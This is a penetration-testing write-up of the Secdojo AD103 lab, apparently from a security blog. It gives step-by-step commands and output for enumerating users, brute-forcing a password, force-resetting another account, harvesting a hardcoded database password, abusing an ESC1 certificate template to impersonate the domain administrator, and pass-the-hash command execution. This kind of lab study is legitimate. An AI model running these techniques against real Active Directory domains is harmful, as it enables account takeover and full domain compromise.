Post

AD103: an Intermediate AD enterprise forest from secdojo

AD103: an Intermediate AD enterprise forest from secdojo
Intermediate Secdojo

Overview

An Active Directory enterprise environment focused on chaining vector attacks, from abusing weak permissions to compromising core enterprise services.

Reconnaissance

Note: This writeup moves quickly through reconnaissance. For a detailed breakdown of the recon methodology, see the Cascade writeup.

Network Stack

we have 2 machines here, let’s start an nmap scan on both but before that let’s add these to out /etc/hosts:

1
2
10.8.0.100     DC.mykalis.dojo mykalis.dojo DC
10.8.0.101     OPS.mykalis.dojo OPS

and now nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
nmap -A 10.8.0.100 -v

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-31 18:17:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: mykalis.dojo, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.mykalis.dojo
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.mykalis.dojo
| Issuer: commonName=mykalis-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-31T13:48:28
| Not valid after:  2026-05-31T13:48:28
| MD5:     c517 cbc0 59f0 b7e3 b97d fc61 d30e 27bd
| SHA-1:   e15d 27d6 2f18 6366 a4cf 27d9 541f b98a f69b d174
|_SHA-256: ff47 2742 9545 7501 a4e8 5e3d 5b9f d18c 9bb8 acb5 099f f88b 7d94 a34a 6c8a ccdd
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mykalis.dojo, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.mykalis.dojo
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.mykalis.dojo
| Issuer: commonName=mykalis-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-31T13:48:28
| Not valid after:  2026-05-31T13:48:28
| MD5:     c517 cbc0 59f0 b7e3 b97d fc61 d30e 27bd
| SHA-1:   e15d 27d6 2f18 6366 a4cf 27d9 541f b98a f69b d174
|_SHA-256: ff47 2742 9545 7501 a4e8 5e3d 5b9f d18c 9bb8 acb5 099f f88b 7d94 a34a 6c8a ccdd
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: mykalis.dojo, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.mykalis.dojo
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.mykalis.dojo
| Issuer: commonName=mykalis-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-31T13:48:28
| Not valid after:  2026-05-31T13:48:28
| MD5:     c517 cbc0 59f0 b7e3 b97d fc61 d30e 27bd
| SHA-1:   e15d 27d6 2f18 6366 a4cf 27d9 541f b98a f69b d174
|_SHA-256: ff47 2742 9545 7501 a4e8 5e3d 5b9f d18c 9bb8 acb5 099f f88b 7d94 a34a 6c8a ccdd
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap
| ssl-cert: Subject: commonName=DC.mykalis.dojo
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.mykalis.dojo
| Issuer: commonName=mykalis-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-31T13:48:28
| Not valid after:  2026-05-31T13:48:28
| MD5:     c517 cbc0 59f0 b7e3 b97d fc61 d30e 27bd
| SHA-1:   e15d 27d6 2f18 6366 a4cf 27d9 541f b98a f69b d174
|_SHA-256: ff47 2742 9545 7501 a4e8 5e3d 5b9f d18c 9bb8 acb5 099f f88b 7d94 a34a 6c8a ccdd
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-03-31T18:18:38+00:00; +10s from scanner time.
| ssl-cert: Subject: commonName=DC.mykalis.dojo
| Issuer: commonName=DC.mykalis.dojo
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-28T13:42:51
| Not valid after:  2026-07-30T13:42:51
| MD5:     b9ef 3225 f61c 0a47 ce42 16c4 2749 18c4
| SHA-1:   3cae d8d2 a73a 9e9a 0465 ac34 ab1a 4cd0 0dee fcd8
|_SHA-256: e7b4 7b95 df66 6f58 27fa b594 c7ce 6a32 3072 b6f5 13de 1f4c c3d3 8f81 e4f5 3af8
| rdp-ntlm-info:
|   Target_Name: MYKALIS
|   NetBIOS_Domain_Name: MYKALIS
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: mykalis.dojo
|   DNS_Computer_Name: DC.mykalis.dojo
|   DNS_Tree_Name: mykalis.dojo
|   Product_Version: 10.0.20348
|_  System_Time: 2026-03-31T18:18:27+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open  ssl/wsmans?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.mykalis.dojo
| Issuer: commonName=DC
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-30T12:55:56
| Not valid after:  2028-05-29T12:55:56
| MD5:     77b6 c649 ba6a d80f 16e7 6c04 022e d3c2
| SHA-1:   d690 d930 6183 1160 121c db58 ae04 e400 fcca 699b
|_SHA-256: aba2 3052 9294 914a 06e4 2a51 8f7a f627 5a44 0c4f b203 53c6 b9e2 a52d 774d 3d20
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|   h2
|_  http/1.1
< SNIP >

nothing out of ordinary here, next:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
nmap -A 10.8.0.101 -v

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Site doesnt have a title.
|_http-server-header: Microsoft-IIS/10.0
81/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  https?
444/tcp  open  snpp?
445/tcp  open  microsoft-ds?
465/tcp  open  smtp          Microsoft Exchange smtpd
| smtp-commands: OPS.mykalis.dojo Hello [10.8.0.3], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH GSSAPI NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=OPS
| Subject Alternative Name: DNS:OPS, DNS:OPS.mykalis.dojo
| Issuer: commonName=OPS
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-31T02:59:06
| Not valid after:  2030-05-31T02:59:06
| MD5:     c4fd c41f c74e 54df 68bc 2138 bc75 d11a
| SHA-1:   b0e6 ba87 a513 4f79 b265 0658 1ed4 a83c e7ee 97c8
|_SHA-256: 5888 1848 6ea0 5afb 0753 da7d 5c9a cddd a872 37be 1130 bd03 4524 76af 788a 713f
| smtp-ntlm-info:
|   Target_Name: MYKALIS
|   NetBIOS_Domain_Name: MYKALIS
|   NetBIOS_Computer_Name: OPS
|   DNS_Domain_Name: mykalis.dojo
|   DNS_Computer_Name: OPS.mykalis.dojo
|   DNS_Tree_Name: mykalis.dojo
|_  Product_Version: 10.0.20348
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
1801/tcp open  msmq?
2103/tcp open  msrpc         Microsoft Windows RPC
2105/tcp open  msrpc         Microsoft Windows RPC
2107/tcp open  msrpc         Microsoft Windows RPC
2525/tcp open  smtp          Microsoft Exchange smtpd
| smtp-commands: OPS.mykalis.dojo Hello [10.8.0.3], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=OPS
| Subject Alternative Name: DNS:OPS, DNS:OPS.mykalis.dojo
| Issuer: commonName=OPS
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-31T02:59:06
| Not valid after:  2030-05-31T02:59:06
| MD5:     c4fd c41f c74e 54df 68bc 2138 bc75 d11a
| SHA-1:   b0e6 ba87 a513 4f79 b265 0658 1ed4 a83c e7ee 97c8
|_SHA-256: 5888 1848 6ea0 5afb 0753 da7d 5c9a cddd a872 37be 1130 bd03 4524 76af 788a 713f
| smtp-ntlm-info:
|   Target_Name: MYKALIS
|   NetBIOS_Domain_Name: MYKALIS
|   NetBIOS_Computer_Name: OPS
|   DNS_Domain_Name: mykalis.dojo
|   DNS_Computer_Name: OPS.mykalis.dojo
|   DNS_Tree_Name: mykalis.dojo
|_  Product_Version: 10.0.20348
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open  wsmans?
| ssl-cert: Subject: commonName=OPS
| Subject Alternative Name: DNS:OPS, DNS:OPS.mykalis.dojo
| Issuer: commonName=OPS
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-30T12:59:38
| Not valid after:  2028-05-29T12:59:38
| MD5:     678c 2359 82a6 1481 5001 ad99 9868 3f60
| SHA-1:   514c c57f 7ca8 29e9 90c3 656f b649 e1f1 2923 cb0d
|_SHA-256: e2f6 e691 143d 6708 14f6 37f5 fb74 37b6 76f3 aa16 7cee 9673 6764 2714 d0bf b383
6001/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
8080/tcp open  http          Microsoft IIS httpd 10.0
|_http-title: Mykalis \xE2\x80\x94 Business & Technology Consulting
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
< SNIP>

this is quite interesting, we have smtp and smpts and quite the webserver on 80, 443 and 8080.

from this port 8080 we find a few names of employees, we can be bother to generate potential usernames but the Email us already spells the format, for example : Layla Abdullah => labdullah ( from the email us ) Sophie Bernard => sbernard ( we did the same format we observed from email us ) Julien Moreau => jmoreau William Anderson => wanderson

this requires deriving usernames from the website and bruteforcing — not the most elegant path, but the password policy shows no lockout so it’s viable. Password spraying with a targeted list is the cleaner approach here.

we can verify with kerbrute :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ kerbrute userenum --domain mykalis.dojo --dc 10.8.0.100   users.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/01/26 - Ronnie Flathers @ropnop

2026/04/01 00:02:48 >  Using KDC(s):
2026/04/01 00:02:48 >  	10.8.0.100:88

2026/04/01 00:02:48 >  [+] VALID USERNAME:	 jmoreau@mykalis.dojo
2026/04/01 00:02:48 >  [+] VALID USERNAME:	 labdullah@mykalis.dojo
2026/04/01 00:02:48 >  [+] VALID USERNAME:	 administrator@mykalis.dojo
2026/04/01 00:02:48 >  [+] VALID USERNAME:	 sbernard@mykalis.dojo
2026/04/01 00:02:48 >  [+] VALID USERNAME:	 wanderson@mykalis.dojo
2026/04/01 00:02:48 >  Done! Tested 5 usernames (5 valid) in 0.501 seconds

I added the administrator account just for sanity check. okay we can bother trying passwords against all users, but we have on the 443 port outlopk running:

Outlook

and since in the email us button there is labdullah, I’ll prioritize this user first, we’ll be dealing with large files of passwords, I’m not good at guessing, so we can try with this here a list of weak passwords or just use rockyou, and I’ll use kerbrute :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
kerbrute bruteuser --dc 10.8.0.100 -d mykalis.dojo /usr/share/wordlists/rockyou.txt labdullah

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 02/13/26 - Ronnie Flathers @ropnop

2026/02/13 16:10:55 >  Using KDC(s):
2026/02/13 16:10:55 >  	10.8.0.3:88

2026/02/13 16:15:42 >  [+] VALID LOGIN:	 labdullah@mykalis.dojo:P@ssw0rd
2026/02/13 16:15:43 >  Done! Tested 7800 logins (1 successes) in 287.451 seconds

and we do get a hit, now we do have creds.

Exploitation

these credentials work for both machines.

1
2
3
nxc smb 10.8.0.100 -u labdullah -p P@ssw0rd
SMB         10.8.0.100      445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:mykalis.dojo) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.8.0.100      445    DC               [+] mykalis.dojo\labdullah:P@ssw0rd

and :

1
2
3
nxc smb 10.8.0.101 -u labdullah -p P@ssw0rd
SMB         10.8.0.101      445    OPS              [*] Windows Server 2022 Build 20348 x64 (name:OPS) (domain:mykalis.dojo) (signing:True) (SMBv1:None)
SMB         10.8.0.101      445    OPS              [+] mykalis.dojo\labdullah:P@ssw0rd

we can also login to the MS Exchange server using these credentials : mykalis.dojo\labdullah:P@ssw0rd

let’s also run rusthound-ce in the background:

1
rusthound-ce -d mykalis.dojo -u labdullah -p P@ssw0rd -c All -z

Outlook

we do login to MS Exchange and we find particularly that only these 3 users have email boxes, that’s something we note and we move on.

Outlook

back to bloodhound we see that this user and we have force change password on many users, but notice that only of them has an email box from the list we saw previously so we’ll prioritize resetting his password.

1
nxc smb 10.8.0.100 -u labdullah -p P@ssw0rd -M change-password -o USER=EOBRIEN NEWPASS=Plur1bu5

once we restted his password, let’s check his iboxes :

Outlook

and he has received an email from julien and a zip file is attached to this, let’s download the zip file and unzip, and once inside let’s hunt for secrets and passwords first :

1
2
3
4
$ grep -ir password

<SNIP>
angular_flask/settings.py:SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:PasswordStrongAuth!2025Mykalis@localhost/angular_flask'

okay and jackpot, except that we don’t have users yet and we don’t which user this password belong to, but I’d guess it may be for an sql service.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nxc ldap 10.8.0.100 -u labdullah -p P@ssw0rd --users-export users.txt
LDAP        10.8.0.100      389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:mykalis.dojo) (signing:None) (channel binding:Never)
LDAP        10.8.0.100      389    DC               [+] mykalis.dojo\labdullah:P@ssw0rd
LDAP        10.8.0.100      389    DC               [*] Enumerated 48 domain users: mykalis.dojo
LDAP        10.8.0.100      389    DC               -Username-                    -Last PW Set-       -BadPW-  -Description-
LDAP        10.8.0.100      389    DC               Administrator                 2025-05-20 13:51:07 0        Built-in account for administering the computer/domain
LDAP        10.8.0.100      389    DC               Guest                         <never>             1        Built-in account for guest access to the computer/domain
LDAP        10.8.0.100      389    DC               krbtgt                        2025-05-31 01:45:43 0        Key Distribution Center Service Account
LDAP        10.8.0.100      389    DC               $331000-C4NV05269L5B          <never>             0

< SNIP >
LDAP        10.8.0.100      389    DC               HealthMailboxdfd3ea5          2025-05-31 03:23:37 0
LDAP        10.8.0.100      389    DC               svc_sql                       2025-05-31 13:48:31 0
LDAP        10.8.0.100      389    DC               [*] Writing 48 local users to users.txt

and here we have svc_sql, you can just spray the password on all users like :

1
nxc smb 10.8.0.100 -u users.txt -p 'PasswordStrongAuth!2025Mykalis'

or just be like me and test on svc_sql first since we already have it there as a user.

and the password works for it :

1
2
< SNIP >
SMB         10.8.0.100      445    DC               [+] mykalis.dojo\svc_sql:PasswordStrongAuth!2025Mykalis

back to bloodhound let’s check this user :

Outlook

okay so this user can enroll in the Web-Server template, and what caught my eye is this certificate as we can see has Enrollee Supplies Subject set to TRUE, this basically means that we can request a certificate for any user specifying its upn even administrator, but we don’t know what this certificate can be used for yet, we check the Enhanced Key Usage is set to 1.3.6.1.5.5.7.3.2, this OID is assigned to Client Authentication. this is basically ESC1 I believed, I am not sure.

Privilege Escalation

this should have worked :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
certipy-ad req -u svc_sql@mykalis.dojo -p 'PasswordStrongAuth!2025Mykalis' \
  -dc-ip 10.8.0.100 \
  -ca mykalis-DC-CA \
  -template Web-Server \
  -upn administrator@mykalis.dojo \
  -target DC.mykalis.dojo \
  -sid S-1-5-21-718436270-1213841202-3127682982-500
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 30
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@mykalis.dojo'
[*] Certificate object SID is 'S-1-5-21-718436270-1213841202-3127682982-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'administrator.pfx'

but it doesn’t, I tries to talk to an internal ip address, i guess this is an infra issues, a way around this is to specify the dns server to use :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
certipy-ad req -u svc_sql@mykalis.dojo -p 'PasswordStrongAuth!2025Mykalis' \
  -dc-ip 10.8.0.100 \
  -ca mykalis-DC-CA \
  -template Web-Server \
  -upn administrator@mykalis.dojo \
  -target 10.8.0.100 \
  -sid S-1-5-21-718436270-1213841202-3127682982-500 \
  -ns 10.8.0.100
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 30
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@mykalis.dojo'
[*] Certificate object SID is 'S-1-5-21-718436270-1213841202-3127682982-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

and we can authenticate with the certificate now :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
certipy-ad auth -pfx administrator.pfx -domain mykalis.dojo -dc-ip 10.8.0.100
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@mykalis.dojo'
[*]     SAN URL SID: 'S-1-5-21-718436270-1213841202-3127682982-500'
[*]     Security Extension SID: 'S-1-5-21-718436270-1213841202-3127682982-500'
[*] Using principal: 'administrator@mykalis.dojo'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
File 'administrator.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@mykalis.dojo': aad3b435b51404eeaad3b435b51404ee:d4223ef45c991e27c2339827948a1828

and we can use this hash to get the flag :

1
2
3
4
5
nxc smb 10.8.0.100 -u administrator -H d4223ef45c991e27c2339827948a1828 -x 'type C:\Users\Administrator\Desktop\proof.txt'
SMB         10.8.0.100      445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:mykalis.dojo) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.8.0.100      445    DC               [+] mykalis.dojo\administrator:d4223ef45c991e27c2339827948a1828 (Pwn3d!)
SMB         10.8.0.100      445    DC               [+] Executed command via wmiexec
SMB         10.8.0.100      445    DC               flag_36a6fd77_a664_4295_bd26_e18f18bb8041

Done.

This post is licensed under CC BY 4.0 by the author.